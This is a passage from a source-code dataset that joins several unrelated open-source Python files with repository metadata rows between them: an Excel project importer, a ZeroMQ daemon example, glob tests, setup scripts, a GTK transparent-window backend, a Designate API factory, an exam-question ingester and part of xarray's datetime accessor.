ip.set_date_from(xlrd.xldate.xldate_as_datetime(xls.sheet.cell_value(row_index, 4), 1))
ip.set_date_to(xlrd.xldate.xldate_as_datetime(xls.sheet.cell_value(row_index, 5), 1))
ip.set_lead_organization(xls.sheet.cell_value(row_index, 6))
ip.set_referring_person(xls.sheet.cell_value(row_index, 7))
ip.set_teams(xls.sheet.cell_value(row_index, 8))
ip.set_manager(xls.sheet.cell_value(row_index, 9))
ip.save_project()
self.logger.info('Project', format_message(ip.project))
# Table 2
for row_index in range(xls.project_table_2_first_row, xls.project_table_2_last_row):
ip = IrcamProjects(xls.sheet.cell_value(row_index, 0))
ip.set_external_id(xls.sheet.cell_value(row_index, 1))
ip.set_call_project(xls.sheet.cell_value(row_index, 2))
ip.set_date_from(xlrd.xldate.xldate_as_datetime(xls.sheet.cell_value(row_index, 4), 1))
ip.set_date_to(xlrd.xldate.xldate_as_datetime(xls.sheet.cell_value(row_index, 5), 1))
ip.set_lead_organization(xls.sheet.cell_value(row_index, 6))
ip.set_referring_person(xls.sheet.cell_value(row_index, 7))
ip.set_teams(xls.sheet.cell_value(row_index, 8))
ip.set_manager(xls.sheet.cell_value(row_index, 9))
ip.save_project()
self.logger.info('Project', format_message(ip.project))
| agpl-3.0 | -1,341,572,315,020,319,200 | 36.0125 | 99 | 0.620061 | false |
vsilent/smarty-bot | example/daemon.py | 1 | 2773 | from sys import exit
#from multiprocessing import Process
#from core.config import settings
from core.config.settings import logger
import zmq
class Daemon():
sock = None
bsock = None
response = {}
def __init__(self, name="undefined"):
"""docstring for __init__"""
context = zmq.Context()
self.sock = context.socket(zmq.REP)
self.sock.bind('ipc:///tmp/smarty-%s' % name)
#self.sock.connect('ipc:///tmp/smarty-%s' % name)
#self.bsock = context.socket(zmq.REQ)
#self.bsock.connect('ipc:///tmp/smarty-brain')
#self.response = {
#'text': "error",
#'jmsg': 'error',
#'type': 'response'}
def start(self):
while True:
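            # REP socket contract: every recv_json() must be answered by exactly one send_json().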
msg = self.sock.recv_json()
cmd = msg.get('cmd', None)
if cmd == 'terminate':
self.response['text'] = 'terminated'
self.sock.send_json(self.response)
break
if cmd:
response = self.process_command(cmd)
logger.info('daemon responded with %s' % response)
self.sock.send_json(response)
exit()
    def process_command(self, cmd):
        """Run the requested command and return a response dict for the client."""
        response = {'text': 'unknown command'}
        if cmd == 'run':
            err = 'uhm, I did not understand.'
            try:
                response = self.anymethod()
            except Exception as e:
                logger.exception(e)
                response = {'text': err}
        return response
    def anymethod(self):
        """Example command implementation; replace with real bot behaviour."""
        return 'anymethod method called'
try:
d = Daemon()
d.start()
except KeyboardInterrupt:
logger.info('Terminate process %s')
exit()
| mit | -6,112,931,179,038,487,000 | 29.811111 | 66 | 0.498017 | false |
GreatFruitOmsk/qrc_pathlib | test/qrc_glob.py | 1 | 1104 | import unittest
from qrc_pathlib import qrc_glob
from test import fixture
class TestQrcGlob(unittest.TestCase):
def test_iglob_with_files(self):
self.assertEqual(set(qrc_glob.iglob(':привет.txt')), {':/привет.txt'})
self.assertEqual(set(qrc_glob.iglob(':привет.txt/')), set())
def test_iglob_with_dirs(self):
self.assertEqual(set(qrc_glob.iglob(':dir')), {':/dir'})
self.assertEqual(set(qrc_glob.iglob(':dir/')), {':/dir'})
def test_iglob_pattern(self):
self.assertEqual(set(qrc_glob.iglob(':*.txt')), {':/привет.txt', ':/42.txt'})
self.assertEqual(set(qrc_glob.iglob(':[0-9][0-9].txt')), {':/42.txt'})
def test_iglob_dir_pattern(self):
self.assertEqual(set(qrc_glob.iglob(':/dir/*.txt')), {':/dir/1.txt', ':/dir/2.txt'})
def test_iglob_recursive_pattern(self):
self.assertEqual(set(qrc_glob.iglob(':/**/*.txt')), {':/dir/1.txt', ':/dir/2.txt'})
self.assertEqual(set(qrc_glob.iglob(':/**/*.txt', recursive=True)), {':/dir/1.txt', ':/dir/2.txt', ':/привет.txt', ':/42.txt'})
| mit | -6,275,855,797,841,274,000 | 40.307692 | 135 | 0.60149 | false |
marcelometal/python-semanticversion | setup.py | 1 | 2387 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2014 The python-semanticversion project
import codecs
import os
import re
import sys
from setuptools import setup
root_dir = os.path.abspath(os.path.dirname(__file__))
def get_version(package_name):
version_re = re.compile(r"^__version__ = [\"']([\w_.-]+)[\"']$")
package_components = package_name.split('.')
init_path = os.path.join(root_dir, *(package_components + ['__init__.py']))
with codecs.open(init_path, 'r', 'utf-8') as f:
for line in f:
match = version_re.match(line[:-1])
if match:
return match.groups()[0]
return '0.1.0'
def clean_readme(fname):
"""Cleanup README.rst for proper PyPI formatting."""
with codecs.open(fname, 'r', 'utf-8') as f:
return ''.join(
re.sub(r':\w+:`([^`]+?)( <[^<>]+>)?`', r'``\1``', line)
for line in f
if not (line.startswith('.. currentmodule') or line.startswith('.. toctree'))
)
PACKAGE = 'semantic_version'
setup(
name=PACKAGE,
version=get_version(PACKAGE),
author="Raphaël Barrois",
author_email="[email protected]",
description="A library implementing the 'SemVer' scheme.",
long_description=clean_readme('README.rst'),
license='BSD',
keywords=['semantic version', 'versioning', 'version'],
url='https://github.com/rbarrois/python-semanticversion',
download_url='http://pypi.python.org/pypi/semantic_version/',
packages=['semantic_version'],
setup_requires=[
'setuptools>=0.8',
],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Software Development :: Libraries :: Python Modules'
],
test_suite='tests',
)
| bsd-2-clause | 6,003,106,888,543,752,000 | 31.684932 | 89 | 0.595977 | false |
tartakynov/enso | enso/platform/linux/graphics.py | 1 | 13206 | """
Author : Guillaume "iXce" Seguin
Email : [email protected]
Copyright (C) 2008, Guillaume Seguin <[email protected]>.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. Neither the name of Enso nor the names of its contributors may
be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS
BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import logging
from time import sleep
import gtk
import cairo
from enso.events import EventManager
# Max opacity as used in Enso core (opacities will be converted to fit in
# [0;1] in this backend)
MAX_OPACITY = 0xff
# Enable Fake transparency when no the screen isn't composited?
FAKE_TRANSPARENCY = False
class TransparentWindow (object):
'''TransparentWindow object, using a gtk.Window'''
__instance = None
class _impl (gtk.Window):
'''Actual implementation of the TransparentWindow ; this mechanism is
due to the way Enso handles TransparentWindows deletion, which requires the
main TransparentWindow object to not be referenced by other modules, which
gtk would do, for instance.'''
__gsignals__ = {
"expose-event" : "override",
"screen-changed" : "override",
}
__wallpaper_surface = None
__wallpaper_screen = None
def __init__ (self, x, y, maxWidth, maxHeight):
'''Initialize object'''
gtk.Window.__init__ (self, gtk.WINDOW_POPUP)
self.__x = x
self.__y = y
self.__maxWidth = maxWidth
self.__maxHeight = maxHeight
self.__width = maxWidth
self.__height = maxHeight
self.__surface = None
self.__opacity = 0xff
self.__screen_composited = False
self.__eventMgr = EventManager.get ()
self.set_app_paintable (True)
self.do_screen_changed ()
self.connect ("motion-notify-event", self.on_motion_notify_event)
self.connect ("delete-event", self.ensure_pointer_ungrabbed)
self.move (self.__x, self.__y)
self.set_default_size (self.__width, self.__height)
def grab_pointer (self, *args):
'''Grab pointer to be able to catch all motion events'''
if not gtk.gdk.pointer_is_grabbed ():
mask = gtk.gdk.POINTER_MOTION_MASK
while gtk.gdk.pointer_grab (self.window, True, mask) \
!= gtk.gdk.GRAB_SUCCESS:
sleep (0.1)
def ensure_pointer_ungrabbed (self, *args):
'''Make sure the pointer is ungrabbed to avoid bad deadlocks'''
if gtk.gdk.pointer_is_grabbed ():
gtk.gdk.pointer_ungrab ()
def on_motion_notify_event (self, window, event):
'''Forward mouse motion events to Enso core'''
self.__eventMgr.onMouseMove (event.x, event.y)
def do_expose_event (self, event):
'''Handle expose events'''
if event.window == self.window:
cr = self.window.cairo_create ()
self.draw_surface (cr)
def draw_surface (self, cr):
'''Draw surface to the window Cairo context'''
cr.rectangle (0, 0, self.__width, self.__height)
cr.clip ()
cr.set_operator (cairo.OPERATOR_CLEAR)
cr.paint ()
if self.__surface:
cr.set_operator (cairo.OPERATOR_OVER)
cr.set_source_surface (self.__surface)
if not self.__screen_composited and not FAKE_TRANSPARENCY:
cr.paint ()
else:
cr.paint_with_alpha (float (self.__opacity) / MAX_OPACITY)
if not self.__screen_composited and FAKE_TRANSPARENCY:
self.draw_wallpaper (cr)
def draw_wallpaper (self, cr):
'''Draw wallpaper below surface contents to fake transparency'''
if not TransparentWindow._impl.__wallpaper_surface:
                self.__update_wallpaper_surface ()
if not TransparentWindow._impl.__wallpaper_surface:
return
cr.set_operator (cairo.OPERATOR_DEST_ATOP)
cr.set_source_surface (TransparentWindow._impl.__wallpaper_surface)
cr.mask_surface (self.__surface)
def __update_wallpaper_surface (self):
'''Internal function that fetches the root window pixmap to use
as background when doing fake transparency'''
screen = self.get_screen ()
if TransparentWindow._impl.__wallpaper_screen == screen:
return
TransparentWindow._impl.__wallpaper_screen = screen
root = screen.get_root_window ()
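            # _XROOTPMAP_ID on the root window is the pixmap most desktops use for the wallpaper.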
id = root.property_get ("_XROOTPMAP_ID", "PIXMAP")[2][0]
if hasattr (gtk.gdk, "gdk_pixmap_foreign_new"):
pixmap = gtk.gdk.gdk_pixmap_foreign_new (long (id))
else:
pixmap = gtk.gdk.pixmap_foreign_new (long (id))
width, height = screen.get_width (), screen.get_height ()
if (width, height) != pixmap.get_size():
return
pixmap.set_colormap (screen.get_rgb_colormap ())
wallpaper_surface = cairo.ImageSurface (cairo.FORMAT_ARGB32,
width, height)
cr2 = cairo.Context (wallpaper_surface)
gdkcr = gtk.gdk.CairoContext (cr2)
gdkcr.set_source_pixmap (pixmap, 0, 0)
gdkcr.paint ()
TransparentWindow._impl.__wallpaper_surface = wallpaper_surface
def do_screen_changed (self, old_screen = None):
'''Update colormap/background and so on when screen changes'''
screen = self.get_screen ()
colormap = None
if hasattr (screen, "get_rgba_colormap"):
colormap = screen.get_rgba_colormap ()
if not colormap:
logging.warn ('''No RGBA colormap available, \
falling back to RGB''')
colormap = screen.get_rgb_colormap ()
self.set_colormap (colormap)
self.__screen_composited = False
if hasattr (screen, "is_composited"):
self.__screen_composited = screen.is_composited ()
if not self.__screen_composited and FAKE_TRANSPARENCY:
logging.warn ('''Switching to fake transparency mode, \
please use a compositing manager to get proper blending.''')
self.__update_wallpaper_surface ()
def update_shape (self):
'''Update the window shape'''
pixmap = gtk.gdk.Pixmap (None, self.__width, self.__height, 1)
cr = pixmap.cairo_create ()
cr.rectangle (0, 0, self.__width, self.__height)
cr.clip ()
self.draw_surface (cr)
if hasattr (self, "input_shape_combine_mask"):
self.input_shape_combine_mask (None, 0, 0)
self.input_shape_combine_mask (pixmap, 0, 0)
if not self.__screen_composited:
self.shape_combine_mask (pixmap, 0, 0)
def update (self):
'''Queue drawing when Enso core requests it'''
if self.__surface:
self.update_shape ()
self.queue_draw ()
def makeCairoSurface (self):
'''Prepare a Cairo Surface large enough for this window'''
if not self.__surface:
self.__surface = cairo.ImageSurface (cairo.FORMAT_ARGB32,
self.__maxWidth,
self.__maxHeight)
self.update_shape ()
self.show ()
return self.__surface
def setOpacity (self, opacity):
'''Set window opacity and grab or ungrab the pointer according to
the opacity level ; this is probably a FIXME cause it looks really ugly and
might cause bad conflicts or race conditions in the future.'''
self.__opacity = opacity
# FIXME: I'm not clean
if self.__opacity == MAX_OPACITY:
self.grab_pointer ()
else:
self.ensure_pointer_ungrabbed ()
self.update ()
def getOpacity (self):
'''Get window opacity'''
return self.__opacity
def setPosition( self, x, y ):
'''Set window position'''
self.__x = x
self.__y = y
self.move (self.__x, self.__y)
def getX (self):
'''Get window x coordinate'''
return self.__x
def getY (self):
'''Get window y coordinate'''
return self.__y
def setSize (self, width, height):
'''Resize window and update input shape'''
self.__width = width
self.__height = height
self.resize (self.__width, self.__height)
self.update_shape ()
def getWidth (self):
'''Get window width'''
return self.__width
def getHeight (self):
'''Get window height'''
return self.__height
def getMaxWidth (self):
'''Get window maximum width'''
return self.__maxWidth
def getMaxHeight (self):
'''Get window maximum height'''
return self.__maxHeight
def finish (self):
'''Finish this window: delete the Cairo surface, ungrab pointer
and destroy it.'''
if self.__surface:
self.__surface.finish ()
self.__surface = None
self.ensure_pointer_ungrabbed ()
self.destroy ()
def __init__ (self, x, y, maxWidth, maxHeight):
'''Initialize object'''
instance = TransparentWindow._impl (x, y, maxWidth, maxHeight)
self.__dict__['_TransparentWindow__instance'] = instance
def __getattr__ (self, attr):
'''Delegate to inner implementation'''
return getattr (self.__instance, attr)
def __setattr__ (self, attr, value):
'''Delegate to inner implementation'''
return setattr (self.__instance, attr, value)
def __del__ (self):
'''Destroy the inner instance'''
self.finish ()
def getCurrentMonitor ():
'''Helper fetching the current monitor of focus'''
from enso.platform.linux import utils
display = utils.get_display ()
input_focus = display.get_input_focus ()
if input_focus != None and input_focus.focus:
window = input_focus.focus
geom = window.get_geometry()
width = geom.width
if (width == display.screen().width_in_pixels):
'''Either a full screen window or desktop.
We will use mouse coordinates for this'''
_, x, y, _ = gtk.gdk.display_get_default().get_pointer()
else:
'''A floating window. We will see which monitor
the majority of the window is on'''
root = window.query_tree().root
trans = root.translate_coords(window, 0, 0)
x = trans.x + (width / 2)
y = trans.y
else:
x, y = 0, 0
print "no focus"
return gtk.gdk.screen_get_default ().get_monitor_at_point(x, y)
def getDesktopOffset ():
'''Helper fetching the offset so that Enso can draw on multiple desktops'''
left, top, _, _ = gtk.gdk.screen_get_default ().get_monitor_geometry (getCurrentMonitor ())
return left, top
def getDesktopSize ():
_, _, width, height = gtk.gdk.screen_get_default ().get_monitor_geometry (getCurrentMonitor ())
return width, height
| bsd-3-clause | 1,813,447,158,428,719,600 | 39.012422 | 99 | 0.564213 | false |
melodous/designate | designate/api/v2/__init__.py | 1 | 1664 | # Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Author: Kiall Mac Innes <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import pecan.deploy
from oslo.config import cfg
from designate.api.v2 import patches # flake8: noqa
from designate.openstack.common import log as logging
LOG = logging.getLogger(__name__)
OPTS = [
cfg.ListOpt('enabled-extensions-v2', default=[],
help='Enabled API Extensions'),
]
cfg.CONF.register_opts(OPTS, group='service:api')
def factory(global_config, **local_conf):
if not cfg.CONF['service:api'].enable_api_v2:
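        # With the v2 API disabled, serve a minimal WSGI app that returns 404 for every request.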
def disabled_app(environ, start_response):
status = '404 Not Found'
start_response(status, [])
return []
return disabled_app
conf = {
'app': {
'root': 'designate.api.v2.controllers.root.RootController',
'modules': ['designate.api.v2'],
'errors': {
404: '/errors/not_found',
405: '/errors/method_not_allowed',
'__force_dict__' : True
}
}
}
app = pecan.deploy.deploy(conf)
return app
| apache-2.0 | -2,081,888,719,544,165,000 | 29.254545 | 75 | 0.643029 | false |
RazerM/ratelimiter | setup.py | 1 | 1597 | # Original work Copyright 2013 Arnaud Porterie
# Modified work Copyright 2015 Frazer McLean
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from setuptools import setup
FILE = 'ratelimiter/__init__.py'
init_data = open(FILE).read()
metadata = dict(re.findall("__([a-z]+)__ = '([^']+)'", init_data))
AUTHOR_EMAIL = metadata['author']
VERSION = metadata['version']
LICENSE = metadata['license']
DESCRIPTION = metadata['description']
AUTHOR, EMAIL = re.match(r'(.*) <(.*)>', AUTHOR_EMAIL).groups()
extras_require = dict()
extras_require['test'] = {
'pytest>=3.0',
}
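# Environment-marker extras: pytest-asyncio is only pulled in on Python >= 3.5.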
extras_require['test:python_version>="3.5"'] = {'pytest-asyncio'}
setup(
name='ratelimiter',
version=VERSION,
description=DESCRIPTION,
long_description=open('README.rst').read(),
author=AUTHOR,
author_email=EMAIL,
url='https://github.com/RazerM/ratelimiter',
packages=['ratelimiter'],
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: Apache Software License',
],
license=LICENSE,
extras_require=extras_require)
| apache-2.0 | -4,260,098,636,080,958,000 | 29.132075 | 74 | 0.696306 | false |
WalterSchaertl/NYRP | question_maker.py | 1 | 5644 | # Takes a .txt semi-edited version of an exam and creates questions from it
# Inputs:
# A .txt version of the exam (requires some pre-possessing)
# A .txt version of the answers (question # question answer, 1 per line)
# A path of the folder of images that go with the question, named as subject_year_month_question#.JPG
# The subject (must be an option from NYRegentsPrep/settings.py SUBJECTS)
# The exams year
# The exams month
# TODO: use https://apiv2.online-convert.com/ to auto convert, take in pdf as input
# TODO: preprocess to strip whitespace etc.
# TODO: break up into multiple stages?
import sys
import re
import os
from shutil import copy
os.environ["DJANGO_SETTINGS_MODULE"] = "NYRegentsPrep.settings"
import django
django.setup()
from NYRP.models import Question
def main():
if len(sys.argv) != 7:
print("Requires five parameters: the questions text file, the answers text file, the subject, the Year of the"
" exam, the month of the exam.")
print("ex) python3 question_maker.py questions.txt answers.txt . CHEM 2020 August")
return
ans_map = {1: "A", 2: "B", 3: "C", 4: "D", 5: "E"}
answers = dict()
questions = dict()
questions_file = sys.argv[1]
answers_file = sys.argv[2]
picture_dir = sys.argv[3]
subject = sys.argv[4]
year = sys.argv[5]
month = sys.argv[6]
# Read in the correct answers
with open(answers_file) as f:
for line in f.readlines():
q, a = line.split()
answers[int(q)] = int(a)
# Part 1: Read in and parse the exam
with open(questions_file) as f:
lines = f.readlines()
for i in range(len(lines)):
# Search for the start of a question
match = re.compile(r"^\d* ").match(lines[i])
if match is not None and int(match.group(0)) <= 50:
# Start of a question and answers (trim its number) and don't end until the next question
# is found or the end of the file
question_block = lines[i][len(match.group(0)):]
i += 1
while i < len(lines) and re.compile(r"^\d{1,2} ").match(lines[i]) is None:
question_block += lines[i]
i += 1
i -= 1
# Parse through the text of answers looking for (1), (2), (3), and (4)
# These are not guaranteed to be in any particular order
opts = {1: "", 2: "", 3: "", 4: ""}
indexes = sorted([question_block.index("(" + str(i) + ")") for i in range(1, 5)])
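				# Sorting the offsets lets each option be sliced out between consecutive "(n)" markers.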
question = question_block[:indexes[0]].replace("\n", " ").strip()
for j in range(4):
answer_num = int(question_block[int(indexes[j] + 1)])
start = indexes[j]
end = indexes[j + 1] if j + 1 < 4 else -1
opts[answer_num] = question_block[start:end].replace("\n", " ").strip()[4:]
questions[int(match.group(0))] = {
"question": question, "A": opts[1], "B": opts[2], "C": opts[3], "D": opts[4], "E": "",
}
# print(match.group(0) + ": " + question)
# print("\t A: '" + answers[1] + "'")
# print("\t B: '" + answers[2] + "'")
# print("\t C: '" + answers[3] + "'")
# print("\t D: '" + answers[4] + "'\n")
# Part 2: All questions created, go through and assign topics for each and write to file
start = int(input("Start at question: "))
temp_file = sys.argv[1][:sys.argv[1].index(".txt")] + "_formatted_questions.txt"
with open(temp_file, "a") as outf:
for question_num in sorted(questions.keys()):
if question_num < start:
continue
v = questions[question_num]
diagram = ""
diagram_name = subject + "_" + year + "_" + month + "_" + str(question_num) + ".JPG"
if os.path.isfile(os.path.join(picture_dir, diagram_name)):
src = os.path.join(picture_dir, diagram_name)
diagram = os.path.join("diagrams", diagram_name)
copy(src, os.path.join("NYRP", "static", "diagrams/", diagram_name))
print(str(question_num) + ": " + v["question"])
print("\tA: '" + v["A"] + "'")
print("\tB: '" + v["B"] + "'")
print("\tC: '" + v["C"] + "'")
print("\tD: '" + v["D"] + "'")
print("\tE: '" + v["E"] + "'")
print("\tAnswer: " + ans_map[answers[question_num]])
print("\tDiagram: " + diagram)
unit = input("Unit: ")
outf.write(v["question"] + "\n")
outf.write(v["A"] + "\n")
outf.write(v["B"] + "\n")
outf.write(v["C"] + "\n")
outf.write(v["D"] + "\n")
outf.write(v["E"] + "\n")
outf.write(ans_map[answers[question_num]] + "\n")
outf.write(subject + "\n")
outf.write(month + "\n")
outf.write(year + "\n")
outf.write(unit + "\n")
outf.write(diagram + "\n")
if input("Stop? ") in ["Y", "y", "yes", "Yes", "YES"]:
break
print("Intermediate results stored in " + temp_file)
print("Check and edit that file and then save it.")
if input("Continue? [Y/N] ") not in ["Y", "y", "yes", "Yes", "YES"]:
return
# Part 3: Manual edits to the file if required
# Part 4: Read the file and create the db question objects
i = 0
with open(temp_file, "r") as inf:
while i < 50:
i += 1
try:
q = inf.readline().strip()
a = inf.readline().strip()
b = inf.readline().strip()
c = inf.readline().strip()
d = inf.readline().strip()
e = inf.readline().strip()
ans = inf.readline().strip()
subject = inf.readline().strip()
month = inf.readline().strip()
year = int(inf.readline())
unit = int(inf.readline())
diagram = inf.readline().strip()
question = Question.objects.create(question=q, A=a, B=b, C=c, D=d, E=e, ans=ans, subject=subject, month=month,
year=year, unit=unit, group=None, hint=None, diagram=diagram)
try:
question.save()
except Exception as e:
print("Could not save question! " + str(e))
print("question saved: " + str(question))
			except (IOError, ValueError):
				# Reached the end of the formatted file; stop reading.
				break
print("All questions ingested")
if __name__ == "__main__":
main()
| mit | -3,043,786,063,696,455,000 | 34.055901 | 114 | 0.606485 | false |
xray/xray | xarray/core/accessor_dt.py | 1 | 16105 | import numpy as np
import pandas as pd
from .common import (
_contains_datetime_like_objects,
is_np_datetime_like,
is_np_timedelta_like,
)
from .pycompat import dask_array_type
def _season_from_months(months):
"""Compute season (DJF, MAM, JJA, SON) from month ordinal"""
# TODO: Move "season" accessor upstream into pandas
seasons = np.array(["DJF", "MAM", "JJA", "SON"])
months = np.asarray(months)
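    # Month -> season bucket: 12, 1, 2 -> DJF; 3-5 -> MAM; 6-8 -> JJA; 9-11 -> SON.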
return seasons[(months // 3) % 4]
def _access_through_cftimeindex(values, name):
"""Coerce an array of datetime-like values to a CFTimeIndex
and access requested datetime component
"""
from ..coding.cftimeindex import CFTimeIndex
values_as_cftimeindex = CFTimeIndex(values.ravel())
if name == "season":
months = values_as_cftimeindex.month
field_values = _season_from_months(months)
else:
field_values = getattr(values_as_cftimeindex, name)
return field_values.reshape(values.shape)
def _access_through_series(values, name):
"""Coerce an array of datetime-like values to a pandas Series and
access requested datetime component
"""
values_as_series = pd.Series(values.ravel())
if name == "season":
months = values_as_series.dt.month.values
field_values = _season_from_months(months)
else:
field_values = getattr(values_as_series.dt, name).values
return field_values.reshape(values.shape)
def _get_date_field(values, name, dtype):
"""Indirectly access pandas' libts.get_date_field by wrapping data
as a Series and calling through `.dt` attribute.
Parameters
----------
values : np.ndarray or dask.array-like
Array-like container of datetime-like values
name : str
Name of datetime field to access
dtype : dtype-like
dtype for output date field values
Returns
-------
datetime_fields : same type as values
Array-like of datetime fields accessed for each element in values
"""
if is_np_datetime_like(values.dtype):
access_method = _access_through_series
else:
access_method = _access_through_cftimeindex
if isinstance(values, dask_array_type):
from dask.array import map_blocks
return map_blocks(access_method, values, name, dtype=dtype)
else:
return access_method(values, name)
def _round_through_series_or_index(values, name, freq):
"""Coerce an array of datetime-like values to a pandas Series or xarray
CFTimeIndex and apply requested rounding
"""
from ..coding.cftimeindex import CFTimeIndex
if is_np_datetime_like(values.dtype):
values_as_series = pd.Series(values.ravel())
method = getattr(values_as_series.dt, name)
else:
values_as_cftimeindex = CFTimeIndex(values.ravel())
method = getattr(values_as_cftimeindex, name)
field_values = method(freq=freq).values
return field_values.reshape(values.shape)
def _round_field(values, name, freq):
"""Indirectly access rounding functions by wrapping data
as a Series or CFTimeIndex
Parameters
----------
values : np.ndarray or dask.array-like
Array-like container of datetime-like values
name : {"ceil", "floor", "round"}
Name of rounding function
freq : str
a freq string indicating the rounding resolution
Returns
-------
rounded timestamps : same type as values
Array-like of datetime fields accessed for each element in values
"""
if isinstance(values, dask_array_type):
from dask.array import map_blocks
dtype = np.datetime64 if is_np_datetime_like(values.dtype) else np.dtype("O")
return map_blocks(
_round_through_series_or_index, values, name, freq=freq, dtype=dtype
)
else:
return _round_through_series_or_index(values, name, freq)
def _strftime_through_cftimeindex(values, date_format):
"""Coerce an array of cftime-like values to a CFTimeIndex
and access requested datetime component
"""
from ..coding.cftimeindex import CFTimeIndex
values_as_cftimeindex = CFTimeIndex(values.ravel())
field_values = values_as_cftimeindex.strftime(date_format)
return field_values.values.reshape(values.shape)
def _strftime_through_series(values, date_format):
"""Coerce an array of datetime-like values to a pandas Series and
apply string formatting
"""
values_as_series = pd.Series(values.ravel())
strs = values_as_series.dt.strftime(date_format)
return strs.values.reshape(values.shape)
def _strftime(values, date_format):
if is_np_datetime_like(values.dtype):
access_method = _strftime_through_series
else:
access_method = _strftime_through_cftimeindex
if isinstance(values, dask_array_type):
from dask.array import map_blocks
return map_blocks(access_method, values, date_format)
else:
return access_method(values, date_format)
class Properties:
def __init__(self, obj):
self._obj = obj
def _tslib_field_accessor( # type: ignore
name: str, docstring: str = None, dtype: np.dtype = None
):
def f(self, dtype=dtype):
if dtype is None:
dtype = self._obj.dtype
obj_type = type(self._obj)
result = _get_date_field(self._obj.data, name, dtype)
return obj_type(
result, name=name, coords=self._obj.coords, dims=self._obj.dims
)
f.__name__ = name
f.__doc__ = docstring
return property(f)
def _tslib_round_accessor(self, name, freq):
obj_type = type(self._obj)
result = _round_field(self._obj.data, name, freq)
return obj_type(result, name=name, coords=self._obj.coords, dims=self._obj.dims)
def floor(self, freq):
"""
Round timestamps downward to specified frequency resolution.
Parameters
----------
freq : str
a freq string indicating the rounding resolution e.g. "D" for daily resolution
Returns
-------
floor-ed timestamps : same type as values
Array-like of datetime fields accessed for each element in values
"""
return self._tslib_round_accessor("floor", freq)
def ceil(self, freq):
"""
Round timestamps upward to specified frequency resolution.
Parameters
----------
freq : str
a freq string indicating the rounding resolution e.g. "D" for daily resolution
Returns
-------
ceil-ed timestamps : same type as values
Array-like of datetime fields accessed for each element in values
"""
return self._tslib_round_accessor("ceil", freq)
def round(self, freq):
"""
Round timestamps to specified frequency resolution.
Parameters
----------
freq : str
a freq string indicating the rounding resolution e.g. "D" for daily resolution
Returns
-------
rounded timestamps : same type as values
Array-like of datetime fields accessed for each element in values
"""
return self._tslib_round_accessor("round", freq)
class DatetimeAccessor(Properties):
"""Access datetime fields for DataArrays with datetime-like dtypes.
Fields can be accessed through the `.dt` attribute
for applicable DataArrays.
Examples
---------
>>> import xarray as xr
>>> import pandas as pd
>>> dates = pd.date_range(start="2000/01/01", freq="D", periods=10)
>>> ts = xr.DataArray(dates, dims=("time"))
>>> ts
<xarray.DataArray (time: 10)>
array(['2000-01-01T00:00:00.000000000', '2000-01-02T00:00:00.000000000',
'2000-01-03T00:00:00.000000000', '2000-01-04T00:00:00.000000000',
'2000-01-05T00:00:00.000000000', '2000-01-06T00:00:00.000000000',
'2000-01-07T00:00:00.000000000', '2000-01-08T00:00:00.000000000',
'2000-01-09T00:00:00.000000000', '2000-01-10T00:00:00.000000000'],
dtype='datetime64[ns]')
Coordinates:
* time (time) datetime64[ns] 2000-01-01 2000-01-02 ... 2000-01-10
>>> ts.dt
<xarray.core.accessor_dt.DatetimeAccessor object at 0x118b54d68>
>>> ts.dt.dayofyear
<xarray.DataArray 'dayofyear' (time: 10)>
array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
Coordinates:
* time (time) datetime64[ns] 2000-01-01 2000-01-02 ... 2000-01-10
>>> ts.dt.quarter
<xarray.DataArray 'quarter' (time: 10)>
array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
Coordinates:
* time (time) datetime64[ns] 2000-01-01 2000-01-02 ... 2000-01-10
"""
def strftime(self, date_format):
'''
Return an array of formatted strings specified by date_format, which
supports the same string format as the python standard library. Details
of the string format can be found in `python string format doc
<https://docs.python.org/3/library/datetime.html#strftime-strptime-behavior>`__
Parameters
----------
date_format : str
date format string (e.g. "%Y-%m-%d")
Returns
